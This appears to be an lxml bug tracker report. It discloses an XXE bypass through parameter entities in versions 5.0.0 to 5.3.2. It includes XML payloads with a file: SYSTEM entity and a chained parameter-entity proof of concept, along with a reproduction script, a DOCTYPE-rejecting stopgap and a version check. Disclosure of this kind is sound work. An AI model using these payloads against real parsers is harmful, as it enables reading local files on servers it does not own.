XXE resolve_entities bypass using Parameter Entity
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| lxml | Fix Released | High | scoder | |
Bug Description
Since 5.0.0, lxml restricts XXE parsing by default and requires the resolve_entities parser option to lift that restriction.
Thus, the XML below
```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE msg [
<!ENTITY xxe SYSTEM 'file:/
]>
<msg>&xxe;</msg>
```
will not work unless resolve_entities is set:
```
from lxml import etree
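# Read the test document as bytes so the XML encoding declaration is honoured
with open('test.xml', 'rb') as f:
    xml_data = f.read()
# Default parser: resolve_entities is not passed explicitly
parser = etree.XMLParser()
root = etree.fromstring(xml_data, parser)
print(etree.tostring(root))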
```
However, libxml2 does not restrict parameter entities, which still leads to XXE.
Thus, the XML below
```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE msg [
<!ENTITY % a '
'>
%a;
%b;
]>
<msg>&c;</msg>
```
works fine, even without resolve_entities.
I've tested this on Python 3.6 through 3.12; it works with lxml 5.0.0 up to and including 5.3.2.
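Both payloads above rely on a DOCTYPE declaration, so one possible stopgap on an affected version is to refuse such documents before they reach lxml. The following is only a minimal sketch of that idea, using the standard library's expat bindings. The helper name `has_doctype` is hypothetical and not part of lxml, and it assumes the application never needs DTDs in its input.

```python
import xml.parsers.expat


class _DoctypeSeen(Exception):
    """Internal signal used to stop parsing at the first DOCTYPE."""


def has_doctype(xml_bytes: bytes) -> bool:
    """Return True if the document contains a DOCTYPE declaration.

    Hypothetical helper: parsing is aborted as soon as expat reports
    the DOCTYPE, so entity declarations inside it are never processed.
    Malformed input still raises xml.parsers.expat.ExpatError.
    """

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Raising inside a handler aborts the parse and propagates out of Parse().
        raise _DoctypeSeen()

    checker = xml.parsers.expat.ParserCreate()
    checker.StartDoctypeDeclHandler = on_doctype
    try:
        checker.Parse(xml_bytes, True)
    except _DoctypeSeen:
        return True
    return False
```

A caller could run `has_doctype(xml_data)` first and only hand the bytes to `etree.fromstring` when it returns `False`. This parses the input twice, which may be acceptable as a temporary measure until the library can be upgraded.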
| Changed in lxml: | |
| milestone: | 6.0 → 5.4.0 |
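To see whether an installed lxml falls in the range reported here, something like the sketch below could be used. It assumes the affected range is exactly what was tested in this report (5.0.0 through 5.3.2) and that the 5.4.0 milestone carries the fix. The function name `is_in_reported_range` is hypothetical; `etree.LXML_VERSION` is the version tuple that lxml exposes.

```python
def is_in_reported_range(version) -> bool:
    """Return True if a version tuple lies within 5.0.0 .. 5.3.2 inclusive.

    Assumption: the range is taken from this bug report only; versions
    outside it were not checked here.
    """
    # Compare only major, minor, patch; lxml's tuple has a fourth element.
    return (5, 0, 0) <= tuple(version[:3]) <= (5, 3, 2)


if __name__ == "__main__":
    try:
        from lxml import etree
    except ImportError:
        print("lxml is not installed")
    else:
        # LXML_VERSION is a tuple such as (5, 3, 2, 0)
        print(etree.LXML_VERSION, is_in_reported_range(etree.LXML_VERSION))
```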

I'd also like to request a CVE for this bug, if you don't mind.